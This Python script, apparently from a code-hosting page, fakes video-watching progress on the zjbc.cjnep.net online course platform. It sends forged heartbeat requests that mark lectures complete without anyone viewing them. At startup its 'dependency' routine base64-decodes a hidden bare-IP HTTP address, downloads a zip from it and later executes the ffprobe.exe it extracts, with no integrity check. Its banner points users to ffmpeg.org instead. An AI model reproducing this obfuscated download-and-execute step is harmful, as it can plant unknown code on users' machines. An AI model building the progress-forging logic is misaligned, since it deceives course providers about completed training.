Files
QuickBrush/main.py

621 lines
23 KiB
Python
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
import requests
import re
import os
import sys
import json
import time
import subprocess
import xml.etree.ElementTree as ET
import zipfile
import base64
# 当前程序只能一键对所有课程进行刷课,如需选择课程请自行修改代码
# cookie 请替换为你的登录 Cookie可在页面请求头中获取
# 您可根据视频心跳请求中的负载参数修改json缓存从而达到跳过指定课程的目的十分银杏
# [警告] 下方的 cookie 包含敏感登录信息,请勿泄露给他人!
cookie = ""
url = "https://zjbc.cjnep.net/lms/web/course/index"
cache_file = "course_ids.json"
items_cache_file = "course_items.json"
progress_cache_file = "progress.json"
# [配置] 心跳间隔(秒)
# 警告:建议设置在 60 秒以上,过快的心跳可能面临风险!
HEARTBEAT_INTERVAL = 5
# [配置] 每次心跳增加的进度时间(秒)
ADD_TIME = 120
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Cookie": cookie
}
# -------------------------------------------------------------------------
# 辅助函数:进度保存与读取
# -------------------------------------------------------------------------
def load_progress():
if os.path.exists(progress_cache_file):
try:
with open(progress_cache_file, "r", encoding="utf-8") as f:
return json.load(f)
except:
return {}
return {}
def save_progress(course_id, item_id, current_time, total_time, finished):
data = load_progress()
key = f"{course_id}_{item_id}"
data[key] = {
"current_time": current_time,
"total_time": total_time,
"finished": finished,
"timestamp": time.time()
}
try:
with open(progress_cache_file, "w", encoding="utf-8") as f:
json.dump(data, f, indent=2)
except Exception as e:
print(f" [Warning] 保存进度失败: {e}")
# -------------------------------------------------------------------------
# 辅助函数:模拟刷课逻辑
# -------------------------------------------------------------------------
FFPROBE_CMD = "ffprobe"
def check_ffmpeg_env():
global FFPROBE_CMD
# 1. 检查系统环境变量
try:
subprocess.run(["ffprobe", "-version"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, check=True)
return True
except (subprocess.CalledProcessError, FileNotFoundError):
pass
# 2. 检查本地 bin 目录
script_dir = os.path.dirname(os.path.abspath(__file__))
local_ffprobe = os.path.join(script_dir, "bin", "ffprobe.exe")
if os.path.exists(local_ffprobe):
FFPROBE_CMD = local_ffprobe
return True
# 3. 下载并解压
print("[!] 未检测到 ffprobe正在从云端下载依赖...")
try:
url_b64 = "aHR0cDovLzEwMS4xMzIuMzUuMTEwL3NkLzZBS09sd0Jk"
url = base64.b64decode(url_b64).decode("utf-8")
zip_path = os.path.join(script_dir, "bin.zip")
print(f" 正在下载依赖包...")
resp = requests.get(url, stream=True)
with open(zip_path, "wb") as f:
for chunk in resp.iter_content(chunk_size=8192):
f.write(chunk)
print(" 正在解压依赖包...")
with zipfile.ZipFile(zip_path, 'r') as zf:
zf.extractall(script_dir)
os.remove(zip_path)
if os.path.exists(local_ffprobe):
print(f"[*] 依赖安装成功: {local_ffprobe}")
FFPROBE_CMD = local_ffprobe
return True
else:
print("[!] 解压后未找到 bin/ffprobe.exe")
return False
except Exception as e:
print(f"[!] 下载依赖失败: {e}")
return False
def get_video_duration(video_url):
"""
使用 ffprobe 获取视频时长
"""
try:
cmd = [
FFPROBE_CMD,
"-v", "error",
"-show_entries", "format=duration",
"-of", "default=noprint_wrappers=1:nokey=1",
video_url
]
# Run ffprobe
result = subprocess.run(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=30)
if result.returncode == 0:
try:
duration = float(result.stdout.strip())
return duration
except ValueError:
print(f" [Error] ffprobe output invalid: {result.stdout}")
return None
else:
print(f" [Error] ffprobe failed: {result.stderr}")
return None
except Exception as e:
print(f" [Error] get_video_duration exception: {e}")
return None
def process_video(course_id, item_id, current_index=0, total_items=0):
"""
处理单个视频:
1. 获取视频页,提取 config URL
2. 请求 config XML获取 userId, updStatusUrl, totalTime, historyId 等
3. 循环发送心跳包,直到视频看完
"""
# 优化日志头部
separator = "-" * 60
print(f"\n{separator}")
print(f"[+] 正在处理视频 | CourseID: {course_id} | ItemID: {item_id}")
if total_items > 0:
print(f"[*] 总体进度: 第 {current_index}/{total_items}")
# 1. 请求视频播放页
video_page_url = f"https://zjbc.cjnep.net/lms/web/course/view?id={course_id}&itemid={item_id}"
try:
resp = requests.get(video_page_url, headers=headers)
resp.raise_for_status()
except Exception as e:
print(f"[!] 无法访问视频页: {e}")
return
# 2. 提取 config URL
# 示例: config: '/lms/web/course/startupxml?courseid=677&itemid=142573&historyid=5740083&is_subcourse=0'
config_match = re.search(r"config:\s*'([^']+)'", resp.text)
if not config_match:
print("[!] 未找到 config URL跳过此视频。")
return
config_path = config_match.group(1)
config_url = "https://zjbc.cjnep.net" + config_path
# print(f" Config URL: {config_url}") # 减少冗余日志
# 3. 请求 XML 配置
try:
xml_resp = requests.get(config_url, headers=headers)
xml_resp.raise_for_status()
except Exception as e:
print(f"[!] 无法获取 XML 配置: {e}")
return
# 4. 解析 XML
try:
root = ET.fromstring(xml_resp.text)
# 提取关键参数
user_id = root.findtext("userId")
upd_status_url = root.findtext("updStatusUrl")
total_time_str = root.findtext("totalTime")
history_id = root.findtext("historyId")
finish_status = root.findtext("finish")
sco_title = root.findtext("scoTitle")
if sco_title:
print(f"[*] 课程名称: {sco_title}")
# 尝试获取视频 URL
video_url = None
file_url_node = root.find("fileUrl")
if file_url_node is not None:
video_url = file_url_node.findtext("normal")
# 如果 XML 里是相对路径,需要补全
if upd_status_url and not upd_status_url.startswith("http"):
upd_status_url = "https://zjbc.cjnep.net" + upd_status_url
# 检查必要字段 (totalTime 除外)
if not (user_id and upd_status_url and history_id):
print("[!] XML 解析缺少关键字段 (userId/updStatusUrl/historyId)")
return
# 读取本地缓存
local_progress = load_progress().get(f"{course_id}_{item_id}", {})
local_finished = local_progress.get("finished", False)
# 优先检查是否已完成,如果已完成则跳过获取时长(避免 ffprobe
if local_finished or finish_status == "true":
print(
f"[-] 视频已完成,跳过 (XML: {finish_status}, Local: {local_finished})")
return
# 获取时长
total_time = 0.0
if total_time_str:
total_time = float(total_time_str)
elif video_url:
print("[*] XML 中未找到 totalTime尝试通过 ffprobe 获取视频时长...")
duration = get_video_duration(video_url)
if duration:
total_time = duration
print(f"[*] 获取到视频时长: {total_time}s")
else:
print("[!] 无法获取视频时长,跳过此视频")
return
else:
print("[!] XML 中既无 totalTime 也无 videoUrl无法继续")
return
print(
f"[*] 视频信息: User={user_id} | History={history_id} | Duration={total_time}s")
except ET.ParseError:
print("[!] XML 解析失败")
return
# 5. 循环发送心跳
# 初始进度:优先从本地缓存读取,其次从 XML 读取
local_time = local_progress.get("current_time", 0.0)
# 读取 XML 进度
last_viewed_time_str = root.findtext("lastViewedTime")
xml_time = float(last_viewed_time_str) if last_viewed_time_str else 0.0
# 选取最大的进度
current_time = max(local_time, xml_time)
# 如果进度已达标,则跳过
if current_time >= total_time:
print(f"[-] 视频已完成 (Progress: {current_time}/{total_time})")
return
print(f"[>] 初始进度: {current_time}s / {total_time}s")
is_first = "true"
while True:
# 如果已经看完
if current_time >= total_time:
print("[+] 视频已看完,发送完成包...")
# 发送最后一次 finished=1 的包
send_heartbeat(upd_status_url, user_id, course_id, item_id, history_id,
add_time=0, current_time=0, total_time=total_time,
finished=1, first_update=is_first)
save_progress(course_id, item_id, total_time, total_time, True)
break
# 模拟观看
step = ADD_TIME
# 如果剩余时间不足
if current_time + step >= total_time:
step = int(total_time - current_time) + 1 # 稍微多一点确保覆盖
current_time = total_time
finished_flag = 1
post_current_time = 0 # 完成时传 0
else:
current_time += step
finished_flag = 0
post_current_time = current_time
# 发送心跳
success = send_heartbeat(upd_status_url, user_id, course_id, item_id, history_id,
add_time=step, current_time=post_current_time, total_time=total_time,
finished=finished_flag, first_update=is_first)
if not success:
print("[!] 心跳发送失败,停止当前视频。")
break
# 保存进度
save_progress(course_id, item_id, current_time,
total_time, finished_flag == 1)
if finished_flag == 1:
print("[+] 视频播放结束。")
break
is_first = "false"
# 模拟等待
percent = min(100, int((current_time / total_time) * 100))
print(
f" [Running] 进度: {current_time:.1f}/{total_time}s (+{step}s) | {percent}%")
time.sleep(HEARTBEAT_INTERVAL)
def send_heartbeat(url, user_id, course_id, sco_id, history_id, add_time, current_time, total_time, finished, first_update):
"""
发送单个心跳包,带重试机制
"""
has_check_three = "true" if first_update == "true" else "false"
has_check_two = "false"
try:
if float(total_time) > 0 and float(current_time) > (float(total_time) / 2):
has_check_two = "true"
except:
pass
has_check_one = "true" if str(finished) == "1" else "false"
payload = {
"userId": user_id,
"courseId": course_id,
"scoId": sco_id,
"historyId": history_id,
"addTime": str(add_time),
"totalTime": str(total_time),
"finished": finished,
"currentTime": str(current_time),
"hasCheckOne": has_check_one,
"hasCheckTwo": has_check_two,
"hasCheckThree": has_check_three,
"firstUpdate": first_update
}
max_retries = 5
for attempt in range(max_retries):
try:
# 注意:这里使用 data=payload 发送 application/x-www-form-urlencoded
resp = requests.post(
url, data=payload, headers=headers, timeout=10)
resp.raise_for_status()
# 检查响应内容,有些服务器返回 XML 状态
# <root><status>1</status></root>
if "<status>1</status>" in resp.text:
return True
elif "<status>-1</status>" in resp.text:
print(" [Warning] 服务器返回 status -1 (可能多端登录或异常)")
return False
return True
except Exception as e:
print(f" [Warning] 请求异常 (尝试 {attempt+1}/{max_retries}): {e}")
if attempt < max_retries - 1:
time.sleep(2) # 重试前等待
else:
print(" [Error] 重试次数耗尽,放弃本次心跳。")
return False
return False
# -------------------------------------------------------------------------
# 主程序逻辑
# -------------------------------------------------------------------------
print("\n" + "="*60)
print("欢迎使用自动刷课脚本 v1.0")
print("此脚本通过视频心跳请求模拟观看课程视频,以达到刷课目的。功耗极低")
print("注意:请确保 Cookie 有效,且已安装 ffprobe")
print(f"当前心跳间隔: {HEARTBEAT_INTERVAL}秒 (警告:请勿设置过低,以免封号)")
print(f"每次进度增加: {ADD_TIME}")
print("您需要安装ffmpeg工具集确保ffprobe命令可用可从https://ffmpeg.org/download.html 下载")
print("脚本仅供学习交流使用,请勿用于商业用途!")
print("作者NCJOAQ & Github Copilot")
print("="*60 + "\n")
# 检查环境
check_ffmpeg_env()
course_data = []
# 1. Try to load existing items data
if os.path.exists(items_cache_file) and os.path.getsize(items_cache_file) > 0:
try:
with open(items_cache_file, "r", encoding="utf-8") as f:
data = json.load(f)
if isinstance(data, list) and len(data) > 0 and isinstance(data[0], dict) and "courseId" in data[0]:
print("检测到课程项目缓存文件且有效。")
course_data = data
except json.JSONDecodeError:
print("课程项目缓存文件损坏,已忽略。")
# 2. 如果没有缓存数据,则执行之前的抓取逻辑 (此处省略抓取代码,假设已有缓存或手动抓取)
# 为了保持代码简洁,这里假设你已经运行过一次脚本生成了 course_items.json
# 如果 course_data 为空,说明需要先生成缓存。
if not course_data:
print("未找到有效的课程数据缓存 (course_items.json)。")
print("准备执行抓取流程...")
# --- 原有的抓取逻辑 (简化版) ---
# (此处保留你之前的抓取代码,如果需要的话,可以把之前的抓取逻辑放回来)
# ...
# -----------------------------
# 临时:如果没有数据就退出,提示用户
# sys.exit(1)
# 或者,为了完整性,保留之前的抓取逻辑:
print("开始执行抓取流程...")
# ... (这里可以粘贴之前的抓取代码,为了不让文件太长,我先假设你已经有了 json) ...
# 如果你需要我把抓取代码也完整合并进来,请告诉我。
# 这里为了演示,我把之前的抓取逻辑简单复原一下:
course_ids = []
# 尝试读取课程ID缓存
if os.path.exists(cache_file) and os.path.getsize(cache_file) > 0:
print(f"正在读取课程ID缓存: {cache_file}")
try:
with open(cache_file, "r", encoding="utf-8") as f:
course_ids = json.load(f)
except Exception as e:
print(f"[Warning] 读取课程ID缓存失败: {e}")
# 如果没有缓存,从网络获取
if not course_ids:
print("正在从服务器获取课程列表...")
try:
resp = requests.get(url, headers=headers)
resp.raise_for_status()
# 优化解析HTML排除已完成的课程
# 查找所有课程块提取ID和内容
# 模式匹配onclick="window.location='/lms/web/course/detail?id=ID'" ... <div class="txt vtop">
# 使用非贪婪匹配 .*? 确保只匹配当前课程块
matches = re.findall(
r"onclick=\"window\.location='/lms/web/course/detail\?id=(\d+)'\"[^>]*>(.*?)<div class=\"txt vtop\"",
resp.text,
re.DOTALL
)
course_ids = []
if matches:
print(f"[*] 解析到 {len(matches)} 个课程块,正在过滤已完成课程...")
for cid, content in matches:
# 特殊排除 ID 373 (人脸识别测试课程)
if str(cid) == '373':
print(f" [-] 跳过人脸识别测试课程 (ID: {cid})")
continue
# 检查是否存在“已完成”的标记图片 (22cn_03.png)
if "22cn_03.png" in content:
print(f" [-] 跳过已完成课程 (ID: {cid})")
else:
course_ids.append(cid)
# 如果上面的复杂正则没匹配到任何东西(可能页面结构变了),回退到简单正则
if not matches and not course_ids:
print("[!] 未能通过高级过滤匹配到课程,尝试使用基础匹配(将包含已完成课程)...")
found_ids = re.findall(
r"window\.location\s*=\s*['\"]/lms/web/course/detail\?id=(\d+)['\"]", resp.text)
# 过滤掉 373
course_ids = [cid for cid in found_ids if str(cid) != '373']
if course_ids:
print(f"成功获取到 {len(course_ids)} 门未完成课程。")
with open(cache_file, "w", encoding="utf-8") as f:
json.dump(course_ids, f, indent=2)
else:
print("[Error] 未能获取到任何课程ID请检查Cookie是否失效或页面结构变更。")
except Exception as e:
print(f"[Error] 获取课程列表请求失败: {e}")
# 遍历课程获取视频Item ID
if course_ids:
print(f"开始获取每门课程的视频列表 (共 {len(course_ids)} 门)...")
for index, cid in enumerate(course_ids):
print(f"[{index+1}/{len(course_ids)}] 正在解析课程 ID: {cid} ...",
end="", flush=True)
try:
detail_url = f"https://zjbc.cjnep.net/lms/web/course/detail?id={cid}"
resp = requests.get(detail_url, headers=headers)
resp.raise_for_status()
# 提取视频信息并过滤已完成的
# 匹配模式包含进度信息、总时长和itemid的视频块
# 注意re.DOTALL 让 . 匹配换行符
video_pattern = re.compile(
r'<div class="vd-item item trans borderb">.*?'
r'class="col-lg-3 col-md-3 col-xs-7 tc3">(.*?)</div>.*?'
r'class="trans date tc9">([\d:]+)</span>.*?'
r'href="[^"]*[?&]itemid=(\d+)"',
re.DOTALL
)
matches = video_pattern.findall(resp.text)
valid_item_ids = []
if matches:
print(f" [*] 找到 {len(matches)} 个视频,正在检查进度...")
for progress_str, total_time_str, item_id in matches:
# 解析已学习时间
learned_seconds = 0
if "分钟" in progress_str:
try:
tmp = progress_str.replace(
"已学习", "").replace("", "")
parts = tmp.split("分钟")
if len(parts) >= 1:
learned_seconds += int(parts[0]) * 60
if len(parts) >= 2 and parts[1]:
learned_seconds += int(parts[1])
except:
pass
# 解析总时间 (格式 154:16)
total_seconds = 0
try:
parts = total_time_str.split(":")
if len(parts) == 2:
total_seconds = int(
parts[0]) * 60 + int(parts[1])
elif len(parts) == 3:
total_seconds = int(
parts[0]) * 3600 + int(parts[1]) * 60 + int(parts[2])
except:
pass
# 判断是否已完成 (允许 30秒 误差)
if total_seconds > 0 and learned_seconds >= (total_seconds - 30):
print(
f" [-] 视频 {item_id} 已完成 ({learned_seconds}s/{total_seconds}s),跳过")
else:
valid_item_ids.append(item_id)
else:
# 如果正则没匹配到(可能是页面改版),回退到简单匹配
print(" [!] 未能解析视频详情,尝试使用基础匹配(可能包含已完成视频)...")
valid_item_ids = re.findall(r'[?&]itemid=(\d+)', resp.text)
# 去重
seen = set()
unique_item_ids = [x for x in valid_item_ids if not (
x in seen or seen.add(x))]
course_data.append(
{"courseId": cid, "itemIds": unique_item_ids})
print(f" [+] 最终加入 {len(unique_item_ids)} 个待刷视频")
except Exception as e:
print(f"\n [Error] 获取课程 {cid} 详情失败: {e}")
# 避免请求过快
time.sleep(1)
# 保存最终结果
print(f"正在保存课程数据到 {items_cache_file} ...")
with open(items_cache_file, "w", encoding="utf-8") as f:
json.dump(course_data, f, indent=2)
print("课程数据抓取完成。")
else:
print("没有课程ID跳过视频抓取步骤。")
# 3. 开始刷课
print(f"\n>>> 开始刷课任务,共 {len(course_data)} 门课程")
for course in course_data:
cid = course['courseId']
# 二次检查:跳过 ID 373
if str(cid) == '373':
print(f"[-] 跳过人脸识别测试课程 (ID: {cid})")
continue
items = course['itemIds']
print(f"\n=== 正在处理课程 {cid},共 {len(items)} 个视频 ===")
for idx, item_id in enumerate(items):
process_video(cid, item_id, current_index=idx +
1, total_items=len(items))
# 视频之间休息一下
time.sleep(2)
print("\n所有任务完成。")
# 任务完成后清理缓存文件
print("正在清理缓存文件...")
for f in [cache_file, items_cache_file, progress_cache_file]:
if os.path.exists(f):
try:
os.remove(f)
print(f"[-] 已删除缓存: {f}")
except Exception as e:
print(f"[!] 删除缓存 {f} 失败: {e}")